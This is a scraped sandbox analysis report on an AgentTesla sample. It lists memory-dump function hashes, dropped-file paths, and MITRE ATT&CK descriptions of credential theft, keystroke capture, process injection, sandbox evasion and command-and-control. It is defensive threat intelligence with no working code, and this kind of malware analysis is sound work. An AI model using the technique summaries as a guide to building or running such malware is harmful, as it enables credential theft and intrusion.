Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 936b96b50f62ec4ee62aac303003cafbaa41e49933247666e22b02423be84c47
Instruction ID: dee66a5e3bb8bfd3ce9b0c7d28ce825619cf44010ffafaf8a619b044df64ca5f
Opcode Fuzzy Hash: 936b96b50f62ec4ee62aac303003cafbaa41e49933247666e22b02423be84c47
Instruction Fuzzy Hash: 7AF08270B052198FC780EFBCD44025E77F2BB85200F10827AC51AC7369EB30C942CB92

Uniqueness

Uniqueness Score: -1.00%

Function 06726471 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 843692f5016e34a27cff7580c7ad69a6f12e7b6d2019e077104702e2046a804d
Instruction ID: 4ac4543b7d2131d19d3eecea53443ac49321c278b91a4fde07cec095b5db2729
Opcode Fuzzy Hash: 843692f5016e34a27cff7580c7ad69a6f12e7b6d2019e077104702e2046a804d
Instruction Fuzzy Hash: 5CE0D171D14156DFDF90CE70CB657697795D741314F204997D044DB141D277DF018701

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 067276A0 Relevance: 13.0, Strings: 10, Instructions: 477COMMON

Download Yara Rule

Strings

$^q, xrefs: 067277B7
$^q, xrefs: 06727C23
$^q, xrefs: 06727B85
$^q, xrefs: 067277DC
$^q, xrefs: 06727B79
$^q, xrefs: 067277E8
$^q, xrefs: 06727C39
$^q, xrefs: 06727C2D
$^q, xrefs: 06727C17
$^q, xrefs: 067277AB

Memory Dump Source

Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2222239885
Opcode ID: 61cd5ad72f916962e918d64f3871e153b99f162118075f9821c3897403d631a1
Instruction ID: 16a7a140e2ac78c300da62ac951b0c35b7fcc739967e85dc69ea85c68929a4ba
Opcode Fuzzy Hash: 61cd5ad72f916962e918d64f3871e153b99f162118075f9821c3897403d631a1
Instruction Fuzzy Hash: B0124E70F0022A8FDB68DF75C954AAEB7B6BF85700F208569D4099B354DB30DD86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0672A950 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$^q, xrefs: 0672AAA1
$^q, xrefs: 0672AA52
$^q, xrefs: 0672AA46
$^q, xrefs: 0672AAD8
$^q, xrefs: 0672AB0E
$^q, xrefs: 0672AB02
$^q, xrefs: 0672AACC
$^q, xrefs: 0672AAAD

Memory Dump Source

Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: 42a8ebe57254e1866f6adbbc28e62f3efa56c0bf8b858c7b63fd9a429c22b02c
Instruction ID: b3e0cc12d3b3445774977ce86ae40de9050af79c411924c1ac029714c41879c8
Opcode Fuzzy Hash: 42a8ebe57254e1866f6adbbc28e62f3efa56c0bf8b858c7b63fd9a429c22b02c
Instruction Fuzzy Hash: A0916E70E1022ADFDB68DF65DA54B7EB7B2BF84700F108629E4019B358DB759C85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 067270A0 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

.5vq, xrefs: 067270FB
$^q, xrefs: 067273DC
$^q, xrefs: 06727382
$^q, xrefs: 0672753C
$^q, xrefs: 067275B4
$^q, xrefs: 067273E8
$^q, xrefs: 067275A8

Memory Dump Source

Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd

Similarity

API ID:
String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-390881366
Opcode ID: 16e9e7611d21331237f068a6e4068e3f503fbac239749a33330a6865c5ffed0f
Instruction ID: 5647565682cb4655cf8b86411ee098000d1b752b696c7292f48d6c5f5036f121
Opcode Fuzzy Hash: 16e9e7611d21331237f068a6e4068e3f503fbac239749a33330a6865c5ffed0f
Instruction Fuzzy Hash: D4F18070B1021ACFDB59EF69C594A6EBBB2FF84304F248529D4159B358DB31EC82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 067283F0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$^q, xrefs: 067286AF
$^q, xrefs: 0672864A
$^q, xrefs: 06728656
$^q, xrefs: 067286BB

Memory Dump Source

Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: f1313acfbd5503e8ba05375d3347f9e94be75ff0f33548ecbb879438d53a5588
Instruction ID: 636118d842a169fdf2f2163f4d4b777e5c0abd7cd2fcff2967e3d89533ebda9f
Opcode Fuzzy Hash: f1313acfbd5503e8ba05375d3347f9e94be75ff0f33548ecbb879438d53a5588
Instruction Fuzzy Hash: 36B17B30B1022A8FDB58DFA9C594A6EB7B2BF84304F248929D4059B359DB35DC86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06728808 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

LR^q, xrefs: 067288FB
LR^q, xrefs: 0672894A
$^q, xrefs: 06728887
$^q, xrefs: 06728893

Memory Dump Source

Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q
API String ID: 0-2454687669
Opcode ID: 2b665532bece6ca5d80714546242c6c98a217264cb963cedf9aa8c4d4ce179ba
Instruction ID: 9ec2e5de48d32c22b921b12acdef83079c11a41b6698ad780bc52d189ad913a8
Opcode Fuzzy Hash: 2b665532bece6ca5d80714546242c6c98a217264cb963cedf9aa8c4d4ce179ba
Instruction Fuzzy Hash: A551E730B102268FDB58DF29D840A6EB7F2FF84304F148669D4059B3A9DB31EC49CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0672ACD8 Relevance: 5.2, Strings: 4, Instructions: 164COMMON

Download Yara Rule

Strings

$^q, xrefs: 0672AE09
$^q, xrefs: 0672AEB4
$^q, xrefs: 0672AE5C
$^q, xrefs: 0672AE8B

Memory Dump Source

Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: f29ca6e71b6c3858fc8f0c0fe71055b90e8bbfdf7b40fe75c936cf649dd5acb0
Instruction ID: 5e1a0411c9d02df534ef3a0d0410ee6c1adcc65b109c6f977ae82f61b3a33d77
Opcode Fuzzy Hash: f29ca6e71b6c3858fc8f0c0fe71055b90e8bbfdf7b40fe75c936cf649dd5acb0
Instruction Fuzzy Hash: 5251A170E202269FDF65DB64D580ABEB3B2EB84301F20853AD805DB358DB31DC42CB91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Networking

System Summary

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jYRIGnZlROed.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_faant0e2.i41.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jyfasj0t.5qf.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_siwyqxrq.ihk.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y4n1cbr0.3o0.psm1

C:\Users\user\AppData\Local\Temp\tmp919E.tmp

C:\Users\user\AppData\Local\Temp\tmp9C4C.tmp

C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe

C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe:Zone.Identifier

Windows Analysis Report
SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre